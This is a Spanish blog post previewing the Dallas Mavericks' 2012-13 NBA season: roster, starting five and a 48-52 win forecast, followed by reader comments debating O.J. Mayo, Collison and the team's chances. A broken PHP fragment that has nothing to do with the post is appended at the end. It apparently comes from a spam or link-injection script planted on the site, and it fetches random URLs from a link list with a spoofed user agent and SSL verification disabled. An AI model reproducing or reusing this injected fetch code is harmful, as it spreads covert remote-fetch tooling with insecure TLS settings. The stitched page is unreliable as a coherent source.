Dallas Mavericks: No Howard, no Deron…¿no party?

08 de October de 2012 por Viva_Dirk

Dallas MavsDespués de que los Mavs se alzaran con su primer anillo, culminando así muchos años de proyectos millonarios y de empeño incesante de su propietario en formar un equipo campeón, en Dallas vieron partir a varias de las piezas fundamentales del campeonato. Tyson Chandler y JJ Barea hacían las maletas con billetes frescos en el bolsillo y todo parecía tener como objetivo firmar en el verano de 2012 a Deron Williams como agente libre. El base, nacido en Dallas, era desde su llegada a la liga el sueño de Mark Cuban, un sueño que no iba a poder consumar una vez aterrizado Deron en los Nets con otro montón de billetes asegurados. Aun así la estrategia seguía teniendo sentido: después de la gloria se había ‘renunciado’ a una temporada para fichar un jugador franquicia y en el mismo verano Dwight Howard tenía todas las papeletas para ser traspasado. Finalmente tampoco fue a Dallas sinó a los Lakers. Así que después de hacer hueco salarial para una estrella, en Dallas se quedaban sin los dos grandes nombres del verano en el mercado. Aun sin haber fichado lo que pretendían, no hay duda de que manejan una plantilla muy superior a la del pasado curso.

En el puesto de base parte con ventaja Darren Collison, el cual después de brillar en ausencia de Chris Paul y ser traspasado a Indiana, ha decepcionado hasta tal punto de ver perdida la titularidad. Después de varios años en la liga y llegado a un proyecto fuerte, se espera de él una mejora de rendimiento clara, sobretodo en la dirección de juego, algo que parece haber olvidado de su etapa en UCLA. Delonte West es un suplente de plenas garantías en ambos puestos del juego exterior. Buen defensor y tirador, además de jugador de gran personalidad cuando su cabeza está donde debe.

OJ Mayo DallasOJ Mayo representa la esperanza delequipo de haber fichado una estrella a coste de buen jugador. El escolta de 25 años tiene delante una gran oportunidad de demostrar que es un All-Star. Ya en sus dos primeras campañas promedió 18 puntos por noche, y en las dos siguientes ha ejercido de 6º hombre con muy buenos resultados, pero en todas ellas ha dejado la sensación de ser un jugador unidimensional, con una gran capacidad anotadora pero sin que su equipo lo note de forma muy positiva. Veremos lo que puede ofrecer en un proyecto donde ya hay un líder claro y jugadores de mucha experiencia. Cualidades las tiene todas. Además de West, en la rotación del juego exterior está Beaubois, que ha visto frenada su progresión por constantes problemas físicos y a quien le tocará pelear por minutos. Su calidad nos deja patente la profundidad de esta plantilla.

Sigue siendo el dueño del puesto de alero Shawn Marion. No necesita que le presentemos porque sus cualidades son de sobra conocidas: pura intendencia, que resulta imprescindible en un equipo que aspira a todo, más aun cuando, como es el caso de Marion, además puede ocupar la posición de ala-pívot y defender a todo tipo de jugadores cuando es necesario. Vince Carter podría tener el papel de anotador de banquillo que muchos veteranos terminan por ocupar. No podemos poner en duda su talento, pero tampoco su falta de carácter para resultar decisivo. Aún así es un excelente suplente.

Dirk Nowitzki

El mejor jugador de la historia de la franquicia sigue al mando de las operaciones. Después de verse por fin levantando el trofeo de campeón de la NBA, Dirk Nowitzki nos dejó una campaña 2011-2012 muy acorde con el equipo, sin dejarse llevar del todo pero gris, sin ambiciones. En esta se presenta con nuevos retos, como son pelear con los ultrajóvenes Thunder o con Los Angeles ‘2k13’ Lakers, además de sus archienemigos los Spurs. Cuando llegue el momento de la batalla, no hay dudas de que Nowitzki sabrá dirigir a la tropa y es que hay pocos ‘generales’ como él. Minutos de calidad pura es lo que debe aportar Elton Brand, que a sus 33 años sigue siendo un jugador muy solvente al poste y ha adquirido un conocimiento del juego que solo dan los años.

El único center puro de la plantilla es Chris Kaman, un pívot que cuando está sano se encuentra entre los más completos de la liga, con buenos movimientos al poste, efectivo desde la media distancia, capaz de rebotear en ambos tableros y defensor infravalorado. Sin duda una gran adquisición que lo mas importante es que llegue entero a los momentos decisivos de la temporada. A Brandan Wright le tocará jugar muchos minutos de pívot y se los ha ganado, ya que después de tres campañas de problemas físicos y de perderse al completo la temporada 2009-2010, aprovechó la mencionada dejadez de la pasada temporada en los Mavs para cuajar una gran campaña, tanto en el aspecto intimidador como en aprovechar todas las ventajas que creaban sus compañeros.

Kaman Wright BrandPodemos decir sin dudar que estamos ante una de las plantillas más profundas de la liga en la que no se echa en falta ningún perfil de jugador, con motivaciones nuevas para todos los jugadores que la componen, con un entrenador que ya ha demostrado saber adaptarse y con un propietario que hará todo lo que esté en su mano para reforzarla si puede. Con todo, no encontraréis a muchos aficionados a la NBA que los vean dejando en el camino a Lakers o Thunders pero tampoco creo que nadie se atreva a decir que será fácil ganarlos. Su objetivo debe ser ganar el factor cancha para la primera ronda. Una vez ahí, solo quedará dejar hasta el último aliento en la cancha.

Quinteto: Darren Collison, O.J. Mayo, Shawn Marion, Dirk Nowitzki y Chris Kaman.
Sexto hombre: Elton Brand / Vince Carter

Pronóstico: 48-52 victorias. Solo los veo perdiendo con los Lakers, en la ronda que les toquen.

Comenta

17 comentarios a esta entrada

  1. The wolf dice:
    #1

    Gran analisis Dirk. Un equipo que nadie querrá cruzarse en Playoffs porque sabes que bien te va a costar un gran esfuerzo y una serie larga y dura el doblegarlos. Con todo si Collison y Mayo ofrecen el rendimiento que deben y Kaman no sufre ningun problema tienen un quinteto muy competitivo.

    P.D: Supongo que en el pronóstico habrás querido poner 48-34… yo les doy un entre 45 y 50 victorias… no me mojo demasiado

      Citar

  2. Denise dice:
    #2

    Tienen un equipazo, pero aun los veo inferiores a Lakers, OKC y Clippers y no excesivamente superiores a los Nuggets dependiendo de la progresión de Faried y McGee.

    En general, creo que tienen mejor equipo que el año pasado, pero no para llegar a una Final de Conferencia si no hay lesionados en los equipos rivales. Collison debería mejorar a Kidd, pero Jason Terry me parece mejor jugador que OJ Mayo, el cual, de sus años en Memphis, solo me ha parecido el tipico chupón talentoso cancerígeno para el colectivo al mas puro estilo Iverson.
    Chris Kaman me parece un refuerzo correcto, no ilusionante pero que hará bien su rol; de Mr 20-10 Brand aun me quedan mas dudas.

    En mi opinión creo que deberian hacer una Regular Season a lo Spurs, dejandose llevar un poquito, dosificandose y darlo todo en Playoffs.
    Pronóstico: 4º -6º del Oeste con un balance de 49-33

      Citar

  3. nba dice:
    #3

    Pues yo creo que estos van a ser terceros del Oeste, detras de OKC y Lakers, sobre todo si Kaman esta sano, y creo que por fin mister-mandarina Mayo, va a tener la libertad para tirar todo lo que quiera.

      Citar

  4. TheDeerHunter dice:
    #4

    Firmo esencialmente lo dicho por Denise.

    Me parecen correctos los movimientos de este verano. Tienen madera de dar guerra todavía, aunque en el Oeste hace falta mucha tralla para sobrevivir.
    Claramente por detrás de Lakers y Thunder, sutilmente por debajo de varios otros o a la par. Diría que pueden quedar entre el 3º y el 10º en la regular del oeste, pero si se cuelan en playoffs bien posicionados cuidadín.

      Citar

  5. rumbero dice:
    #5

    Pues a mi me no me ilusionan tanto como a vosotros la verdad. Su objetivo era pescar a Deron/Howard y como no ha podido ser han tenido que sacar un plan B que si bien mejora al equipo del año pasado no me parece que sea mejor que Thunder,Lakers,Spurs,Clippers y bastante parejo a Grizzlies e incluso Nuggets (teniendo claro que el amigo Dirk desequilibra él solito esta igualadad en cualquier momento). Pero vaya, muchas dudas con Collison en la dirección visto su temporada en Indiana, y Brand-Kaman son dos buenos refuerzos pero que seguramente ya han dado lo mejor de si. Mayo debería convertirse en el segundo espada ofensivo…veremos. Yo los veo entre el 4º-8º y a ver que son capaces de hacer en PO.
    PD: Mañana voy a verlos contra el Barcelona, a ver si Carlise pone un ratito a los buenos y me hacen cambiar la opinión a mejor 😀

      Citar

  6. GreenPride dice:
    #6

    Equipo renovado en los Mavericks que se han quedado con una sensación un tanto rara después de no poder hacerse con los 2 jugadores estrella del mercado (Deron y Howard). Cuban supo reaccionar y ha conseguido un ramillete de fichajes bastante apañado para formar un equipo de nivel medio-alto que puede aspirar a segunda ronda de PO. Esa creo que puede ser su meta más realista y una vez allí ver cómo han llegado y si pueden jugar con todas sus piezas al máximo podrían crear problemas a los grandes capos del Oeste. Para mí por plantilla con todos sanos y ganas de jugar pueden ser el 4º equipo del Oeste, para dar un paso más necesitarían a un Mayo de verdad estrella, otra temporada MVP de Nowitzki y que Kaman estuviera sano y productivo todo el año. Creo que no darán ese último paso pero la verdad es que tampoco lo creía hace dos años cuando ganaron el anillo así que habrá que esperar a ver.

      Citar

  7. Ruxixón dice:
    #7

    Equipo serio,creo que podrán clasificarse para PO’s con mayor o menor sufrimiento pero que estarán dentro es un hecho,siempre y cuando Dirk siga al nivel de siempre.Si no lo hacen será un batacazo porque tienen equipo de sobra.Falta un director como Calderón,que todos creemos que casaría en este equipo de mil maravillas pero bueno..a confiar en Collison hasta nueva orden.Veremos de que pasta está hecho OJ Mayo,es su oportunidad de hacer algo en la liga.

    Lo mínimo sería 7º-8º del oeste,luchando con Denver,Utah y Warriors por esos dos puestos,exigiéndoles que luchen por el 4º-5º-6º durante todo el año con Clippers,Memphis y Minny.Para mí Lakers,Thunder y Spurs están por encima de todos en el oeste (preparándome para la porra xDD)

      Citar

  8. MagicJohnson32 dice:
    #8

    A ver cómo funciona la química del equipo, que a mí me ofrece alguna duda, pero sin duda es buena plantilla, especialmente teniendo en cuenta que fallaron los objetivos principales.

    Espero que Dirk no cometa el error del año pasado, en el que le costó un par de meses arrancar. Debe de estar eufórico: pasa de jugar junto a Haywood, a tener a Kaman y Elton Brand de compañeros de juego interior.

    Creo, eso sí, que falta un líder en el juego exterior, y no acabo de ver a OJ en el papel.

      Citar

  9. Sancho88 dice:
    #9

    Estamos obviando demasiado la baja de Terry…. y sobreestimando las posibilidades de Mayo. Me parece que no quieren desintegrarse, porque como bien dices Viva el señor Cuban siempre quiere tener alguna opción, pero para mí ofrecen muchas dudas. Cómo va a dirigir Collison un equipo del Oeste si en el Este era un mediocre jugador de banquillo? Se ha estancadao no, lo siguiente. No es lo que parecía en los Hornets. Ahí van a tener muchos problemas los Mavs, y como alguien ha apuntado por aquí, les hace falta Calde como el comer. Deberían ficharlo sí o sí. Pero lo curioso es que todos los jugadores importantes les han dado carpetazos, y aunque al final han podido firmar algún contrato decente como el de Kaman, que al lado de su amigo Dirk dará muy buenos minutos, no veo a nadie aportando desde el banquillo, y veo muchos problemas para anotar. Si el director va a ser Collison y la segunda espada Mayo… no sé yo… pero a mí me huele muy muy mal el proyecto, no le veo nada. Yo creo que se quedan fuera. 37-45

      Citar

  10. Esteban dice:
    #10

    todo dependera de MAYO, si se transforma en un anotador capaz de secundar a dirk como stark a ewing, cuidado, sino en todos los otros caso dificilmente pasen semifinal de conferencia

    aunque con cuban nunca se sabe y puede hacer dos movimientos y mejorar el equipo

      Citar

  11. HisRoyalAirness dice:
    #11

    Pues yo reconozco que lo espero todo de Mayo. Me ha parecido un jugador infravalorado en Memphis y a poco que tenga su puesto asegurado y se involucre en la dinámica del equipo le veo madera de All-Star y de jugadorazo

      Citar

  12. nba dice:
    #12

    De All-Star no se, pero hay que recordar que cuando llego a Memphis habia un tal Pau Gasol, al que practicamente acabaron arinconando para que Oj Mayo tuviese protagonismo aun siendo un recien llegado, ya que entre Gay y Oj Mayo…
    Yo espero que se amolde a Dirk, , y demuestre que realmente se puede confiar en el, pero no digamos que lo han infravalorado en Memphis, porque si juntas a la vez en pista a OJ y a Rudy Gay, el resto de compañeros ni olian la bolan, aun apellidandose Gasol y Randolph

      Citar

  13. Denise dice:
    #13

    Sé que es pretemporada pero los Mavs no me estan gustando. Mayo horrible de momento, Collison muy acelerado. De momento solo me quedo con la pareja interior Kaman-Brand

      Citar

  14. Viva_Dirk dice:
    #14

    Entiendo que muchas veces se habla con ligereza, decir que Mayo es un chupón al estilo Iverson o compararlo con Rudy Gay cuando jugaban juntos en Memphis no tiene sentido.

    En sus 2 primeros años, cuando fue titular su número de tiros por noche era de 15, y sus números fueron 18-4-3, con un 45% en tiros de campo y un 38% en triples. Y en los 2 siguientes ejerciendo de 6º hombre, jugando 26 minutos tiró 11 veces por partido con 12 puntos por noche y porcentajes peores. Hizo 2 buenas temporadas como titular, cumpliendo su papel de anotador y de buen defensor.

    Ahora en Dallas hace falta ver si puede dar algo mas, aunque creo que firmando los números de titular en Memphis ya es un gran refuerzo para lo Mavs.

      Citar

  15. simon dice:
    #15

    nba: De All-Star no se, pero hay que recordar que cuando llego a Memphis habia un tal Pau Gasol, al que practicamente acabaron arinconando para que Oj Mayo tuviese protagonismo

    Cuando Mayo llegó a Memphis, gasol ya llevaba media temporada en Los Angeles Lakers.

      Citar

  16. Txusma dice:
    #16

    simon: Cuando Mayo llegó a Memphis, gasol ya llevaba media temporada en Los Angeles Lakers.

    Ayer cuando lo leí lo pensé pero no me dio tiempo a mirarlo. Creo q lo comenta nba va relacionado con Rudy Gay no con OJ Mayo.

      Citar

  17. Kantonyo dice:
    #17

    Se os ha olvidado citar la incoporación del rookie Jae Crowder, es una apuesta segura a cortoplazo, probablemente uno de los novatos mejor preparados para sumar desde el principio (q no de los más talentosos), tiene un potente físico de jugador defensivo pero sorprende con su capacidad anotadora desde media-larga distancia. Le sobra personalidad para robarles minutos a jugadores más consagrados.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>